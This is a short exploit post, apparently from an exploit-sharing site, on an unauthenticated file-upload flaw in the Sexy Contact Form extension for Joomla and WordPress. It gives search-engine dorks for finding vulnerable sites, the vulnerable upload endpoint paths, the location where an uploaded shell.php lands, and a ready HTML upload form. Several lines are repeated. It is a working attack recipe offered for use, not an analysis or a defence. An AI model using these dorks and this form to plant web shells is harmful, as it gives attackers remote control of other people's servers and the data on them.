Joomla com_sexycontact Exploit Vulnerability Wordpress com_sexycontact
Dorks :
1-"inurl:/components/com_sexycontactform/ "
2-"Powered by sexycontact"
3- "inurl:"sexy-contact-form"
1-"inurl:/components/com_sexycontactform/ "
2-"Powered by sexycontact"
3- "inurl:"sexy-contact-form"
Exp: components/com_sexycontactform/fileupload/index.php
Shell : example.com/components/com_sexycontactform/fileupload/files/shell.php
Shell : example.com/components/com_sexycontactform/fileupload/files/shell.php
HTML Upload Source:
<form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Wordpress com_sexycontact Vuln
Dork : wp-content/plugins/sexy-contact-form/
Exp : wp-content/plugins/sexy-contact-form/includes/fileupload/index.php
Shell : wp-content/plugins/sexy-contact-form/includes/fileupload/files/shell.php
Exp : wp-content/plugins/sexy-contact-form/includes/fileupload/index.php
Shell : wp-content/plugins/sexy-contact-form/includes/fileupload/files/shell.php